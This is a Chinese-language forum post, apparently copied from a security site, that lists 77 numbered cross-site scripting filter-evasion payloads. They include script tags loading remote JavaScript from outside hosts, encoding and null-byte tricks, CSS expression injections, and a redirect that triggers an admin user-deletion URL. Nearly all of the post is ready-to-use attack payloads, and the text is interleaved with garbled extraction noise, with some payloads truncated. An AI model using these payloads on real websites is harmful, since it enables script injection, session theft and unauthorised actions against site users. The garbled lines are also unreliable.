貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。/ O' X% U( K! ^2 g0 W& i8 l
(1)普通的XSS JavaScript注入
, l9 g5 I1 z e; W1 q. |9 ~" j& l<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>3 E) b: r& B# B; R4 x
(2)IMG标签XSS使用JavaScript命令
) A3 b8 d9 b t |; U8 ? y<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; U% }# Z. ]7 S4 _4 Y5 s. ^(3)IMG标签无分号无引号$ Q; r. s @! [2 I- `
<IMG SRC=javascript:alert(‘XSS’)>" g0 q$ Q! d9 C. h1 u
(4)IMG标签大小写不敏感
# t" K; Q1 a$ ]<IMG SRC=JaVaScRiPt:alert(‘XSS’)>" N1 |& s+ [7 k. o; L, f- y
(5)HTML编码(必须有分号)7 \' C" S9 t+ B
<IMG SRC=javascript:alert(“XSS”)>
) ~* `7 l+ M8 S0 [(6)修正缺陷IMG标签6 P9 a* _9 ] \, i1 m0 b
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>* G) p m+ Z& u2 g0 e2 d8 g+ ~
6 F/ O5 u3 A b5 i* d! C8 O, t. d; F k g* H; p2 g. A: M# ^' f9 F
(7)formCharCode标签(计算器)1 l3 d( T V5 m
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
$ b- q, o, ]3 N$ A4 ^! E(8)UTF-8的Unicode编码(计算器)
1 Z+ x7 W1 r' ?; j% I<IMG SRC=jav..省略..S')>7 L/ V7 {( Y6 y5 |: p1 O
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
! _( g( m" Y' V4 \; b<IMG SRC=jav..省略..S')>
( T. v; j8 W. G; M Y% ^(10)十六进制编码也是没有分号(计算器). K3 n6 ~) t* ?2 s2 D' C
<IMG SRC=java..省略..XSS')>
- k' z$ [% @6 A+ Y: j3 U(11)嵌入式标签,将Javascript分开
0 p) l2 N2 i' R' `; M# F<IMG SRC=”jav ascript:alert(‘XSS’);”> I, e! N7 N1 T2 `/ o1 ]
(12)嵌入式编码标签,将Javascript分开& H# \* i$ g$ u* K$ U; C
<IMG SRC=”jav ascript:alert(‘XSS’);”>% k$ Q! b8 b& e) c9 f0 F6 U
(13)嵌入式换行符1 h. z2 D0 P2 l0 M& D* f
<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 x; P8 T2 ?/ M S" U0 [: Z(14)嵌入式回车
$ ], K( K/ g4 [- D9 c$ x<IMG SRC=”jav ascript:alert(‘XSS’);”>& y% y- B2 i& y2 Z8 u
(15)嵌入式多行注入JavaScript,这是XSS极端的例子- O P& Q( x0 o% ]4 I
<IMG SRC=”javascript:alert(‘XSS‘)”>* y# B0 g' ~2 s* P: \- N. f- L
(16)解决限制字符(要求同页面)
& u/ }1 l u" l<script>z=’document.’</script>1 F/ U- S; _7 {5 Q; ?* [7 o b
<script>z=z+’write(“‘</script>
: J/ R- i) u+ W* K* ]<script>z=z+’<script’</script>
9 T7 e2 Q) K. ^& f$ S1 l( d<script>z=z+’ src=ht’</script>
+ f) ]& a/ _. Y6 w<script>z=z+’tp://ww’</script>) D4 @2 v! D6 Y/ E$ f
<script>z=z+’w.shell’</script>/ O, l' u' w4 H/ k- g
<script>z=z+’.net/1.’</script>. B4 F# S+ g! a1 t. E! y
<script>z=z+’js></sc’</script>" y/ I. H' z% ]
<script>z=z+’ript>”)’</script>; y, a9 @* ^* s, T$ I5 U
<script>eval_r(z)</script>
; h2 n, S& l4 y& b% S0 |. @(17)空字符12-7-1 T00LS - Powered by Discuz! Board
+ |- S0 U% q& d. nhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
. V' C& l- N; K9 p1 N6 N2 fperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
4 W) m9 E/ B+ H' b: p$ h(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用+ v2 ]* r& e- J, Z
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out! m. I* k* T# v% C R
(19)Spaces和meta前的IMG标签, S1 ~. [; r) \, Q( e0 N
<IMG SRC=” javascript:alert(‘XSS’);”>
3 ~1 v! d: i* K* P( m1 E(20)Non-alpha-non-digit XSS2 c. {1 ?) d5 L6 y/ X6 j
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
/ X9 v/ B! V2 Y$ S(21)Non-alpha-non-digit XSS to 2" N1 I( O6 O) p1 H
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>& e) c* q" [3 k0 i% F. v, f( g3 A
(22)Non-alpha-non-digit XSS to 3
7 b8 O) B( i- b: q<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
. \4 B" O# m# Z(23)双开括号$ R* w- ?3 r: o. q4 r
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
. |/ c4 t! W, {& f1 M(24)无结束脚本标记(仅火狐等浏览器)
- h1 L- X2 M8 \( w k<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
8 G6 w' q* c8 G% x4 ^- A* G- a(25)无结束脚本标记2
; d5 i! F0 @; n( P. r<SCRIPT SRC=//3w.org/XSS/xss.js>+ g5 y u9 Z5 X6 p2 x
(26)半开的HTML/JavaScript XSS% B* }6 ~* x7 n, P; g1 N
<IMG SRC=”javascript:alert(‘XSS’)”
3 n; V1 i O. L2 a) S' [) N. z0 N(27)双开角括号
, a' F! w+ B% E" ?; s3 b0 G<iframe src=http://3w.org/XSS.html <+ r! ^ \( @( R% N
(28)无单引号 双引号 分号
& L/ e- h+ ?- K0 p+ F9 G6 M* S<SCRIPT>a=/XSS/
7 F, c9 N# w5 W# u8 lalert(a.source)</SCRIPT>2 J6 B. y# G% K0 H! N3 C0 r
(29)换码过滤的JavaScript6 |: t, B1 u8 O) ~1 \
\”;alert(‘XSS’);//& G6 y/ M+ z7 f+ f, H
(30)结束Title标签- E& N9 l, D& J
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>8 c1 ~! `$ ]% {( t
(31)Input Image
7 P# v/ q1 R. h1 k) O<INPUT SRC=”javascript:alert(‘XSS’);”>! i- s3 g) U, n1 s |+ V6 H& C
(32)BODY Image" j2 q. _4 S; Q1 B8 x. z) t# d
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
: h, r" A) @0 K: ~ s) J(33)BODY标签
# I; _$ j$ v( p& v2 T- X, A<BODY(‘XSS’)>
; K2 x6 I2 Q, b# i1 L$ k(34)IMG Dynsrc
1 Z6 w2 u( |$ ~/ j2 y {2 C<IMG DYNSRC=”javascript:alert(‘XSS’)”>" h0 t: ]3 n' ~
(35)IMG Lowsrc$ I, A+ K. P( ]) d0 x; Q+ K2 _) Q
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
& S" U; [; r7 o, n, w+ v(36)BGSOUND
! H3 U% T! |3 M3 _. I<BGSOUND SRC=”javascript:alert(‘XSS’);”>
. S; i" u9 b' S U(37)STYLE sheet
; z" J5 x6 T9 H- H+ [7 j, L+ B. M<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
& G( T2 U' q U- N1 r2 c+ ~(38)远程样式表% Z! C s. A' n2 q0 g5 |
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>9 P: {0 s g9 P5 }! t5 Q* R4 D
(39)List-style-image(列表式)* ~4 K3 n+ B2 v7 u3 y1 e* M$ `
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
: ]) m* |& W& G* M4 b. m. p: n(40)IMG VBscript$ K3 g/ J7 S z/ P/ S' ^1 ~
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
# ]3 k9 \+ V$ J( j(41)META链接url# {# b* u+ q( I6 K
. h. N' d9 u) ]* R% v& `' M# C' l+ X# s! ]3 j8 y2 Q
<META HTTP-EQUIV=”refresh” CONTENT=”0;
) h/ `' S8 {; }0 U9 X/ Q6 @9 j, pURL=http://;URL=javascript:alert(‘XSS’);”>" h! C8 X; t/ a% t+ U S
(42)Iframe: [7 g$ J- n# F- J0 Y4 g
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
$ C4 ?$ h( w5 ?2 ^& ]$ _# E" w" d(43)Frame
, k8 P0 R/ D2 `( r* A<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board& \1 j/ ^' A* ` s' ]2 M
https://www.t00ls.net/viewthread ... table&tid=15267 3/6: m2 K# u1 k5 }8 y( b
(44)Table6 j+ S, J* h7 }9 K
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>3 X4 o, L) d8 w! G$ z3 E: w5 @
(45)TD3 J; A b$ F) O0 z" ?6 P; B. Q
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>/ e! ]$ [7 C4 R* d# T* V' m* l
(46)DIV background-image, `- ]* y0 q) L% U+ ~! f
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”># G7 m; y+ K: R" F( E+ K/ A
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8 f, R+ q! H% K: o. ]& r& o
8&13&12288&65279)7 u3 I6 z, C* d" O% R3 l: u# @- o# @- s) p
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
5 s' [" M; B; `! T: F0 I2 m(48)DIV expression
6 |* ~' E1 s" L5 M8 t<DIV STYLE=”width: expression_r(alert(‘XSS’));”># ]1 z* d2 _8 p" z0 K. e4 h3 l& ?1 ~
(49)STYLE属性分拆表达
4 y/ ?5 y* i3 Q( j<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
' W& n* ~. n0 y3 m, [7 C' @7 v5 J(50)匿名STYLE(组成:开角号和一个字母开头)
( N( ?, \3 F7 n; ^! G) }- \9 j<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>0 c9 w- M: f) d' {+ E5 h& m
(51)STYLE background-image+ f/ ?* I, ~+ { ], `
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A0 C2 `" l$ x4 U! \# x
CLASS=XSS></A>
$ z& J" `3 `! x6 e5 @6 e7 [(52)IMG STYLE方式
, ]0 F+ E9 w' G, L$ d4 `exppression(alert(“XSS”))’>4 j: k m) A) o7 N
(53)STYLE background
3 ^ V8 C; K+ ~7 z) F9 r<STYLE><STYLE5 ? B4 L7 g" j# q% |
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
0 [% t! Z) C9 I. C" f# d; P' {( X(54)BASE
3 l/ u# n9 h& A4 k<BASE HREF=”javascript:alert(‘XSS’);//”>' x; S* T% c$ i9 g+ e
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
+ i* q' g6 w6 l<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>" K/ \# W7 T' J" _
(56)在flash中使用ActionScrpt可以混进你XSS的代码0 o7 o1 c) Z {6 }, t9 t/ v
a=”get”;6 ^ u. n$ M+ V, R* m/ G5 P
b=”URL(\”";
( [" P4 U2 d M; X; Q5 uc=”javascript:”;
1 X8 k. P! u+ N; P# W( A5 B7 yd=”alert(‘XSS’);\”)”;
( K/ K% F& L: A' _- ]/ keval_r(a+b+c+d);. B4 _, r! t2 {4 v
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
. K: a) p5 L5 Z7 j1 P" h z$ _3 ?% f<HTML xmlns:xss>/ U& o+ h, h$ R) B
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>. [* n! N/ N1 A" }" K5 ^ d5 o
<xss:xss>XSS</xss:xss>
# G5 I, |, m) r' ]3 @& W9 ~8 q</HTML>- Y- ]4 U2 ]6 ?
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
' Z, O% g% e2 B<SCRIPT SRC=””></SCRIPT>
m/ B9 y, z$ B3 \9 E(59)IMG嵌入式命令,可执行任意命令
$ g- f' C+ r" Z0 {* X3 X: n<IMG SRC=”http://www.XXX.com/a.php?a=b”>
/ k& n( s' C8 k% K$ U1 [(60)IMG嵌入式命令(a.jpg在同服务器)
- I n7 q# X! m6 J0 V. C5 H+ WRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser/ R* D5 J' S( T$ P) ^# _
(61)绕符号过滤
" E G. g8 y! V# U<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 F' I2 L1 |8 b5 q9 f(62)
2 {' s% N/ E7 _( [! ^<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>% X: F( }3 B9 d5 s* T
(63)
5 y. J7 M* m/ c9 E% _<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
9 B! l$ p2 X x" R(64)1 H6 w8 c4 y% c6 g, W
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>0 }+ w3 Q, M# L9 F
(65)" C: U) C5 |; i! ?
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
; N( E0 g- E6 P& _2 X5 ?(66)12-7-1 T00LS - Powered by Discuz! Board( g5 n$ j8 ^; J$ ]9 x2 ~
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
$ z" G. I$ o. M9 j3 A9 U<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>0 g* h @& }9 X) @
(67)0 W3 a; Z* B. k3 A9 i8 {
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”> ]# Y( K" `, D$ x( X; Y: U
</SCRIPT>
5 m) ^9 {; b% B9 \(68)URL绕行; C% g, L: g6 r4 V! u
<A HREF=”http://127.0.0.1/”>XSS</A>
- ^2 k6 n4 I" {$ b8 S0 s(69)URL编码
1 R& c* \# Y1 H" x2 x+ I( o<A HREF=”http://3w.org”>XSS</A>$ E# c& s2 r. e" G1 m X& M
(70)IP十进制
! T4 N4 Q, R, R& @6 I: ^) j) M$ X4 t- m! ^<A HREF=”http://3232235521″>XSS</A>
( u7 O; A0 h6 v(71)IP十六进制+ A" d* C- M5 B3 J- C D7 L$ J
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
/ }0 P) k" P3 f& q* n, P(72)IP八进制7 I( l0 R5 L7 O3 k4 N9 ?2 u
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
& O. h0 K) ?7 S(73)混合编码4 L6 p* q+ T/ L9 F; x: d
<A HREF=”h
4 W$ Y2 {) L6 Ftt p://6 6.000146.0×7.147/”">XSS</A>
" F! F6 E9 _: [/ S(74)节省[http:]# [* e: ~/ \$ j8 ]7 y! g
<A HREF=”//www.google.com/”>XSS</A>
- W8 I! q. ?/ c. e+ a(75)节省[www]
# J, {/ |( J$ Q<A HREF=”http://google.com/”>XSS</A>
/ R% J2 h5 ]! ~/ g5 w; @(76)绝对点绝对DNS; E' A1 [" W- A( k! [& s
<A HREF=”http://www.google.com./”>XSS</A>* z7 I% S$ V- d. h; u- I7 _
(77)javascript链接
( S; g9 I3 x9 A" h/ q<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
, \- C% P9 W# N; w; ~7 C! i. L
, S! R. i+ p: X1 S原文地址:http://fuzzexp.org/u/0day/?p=146 R$ L* R7 f; V* P8 }7 E
$ q8 d- O# y' h: e Z- z6 L/ F6 j
|
发表于 2013-4-19 19:22:37
收藏
支持
反对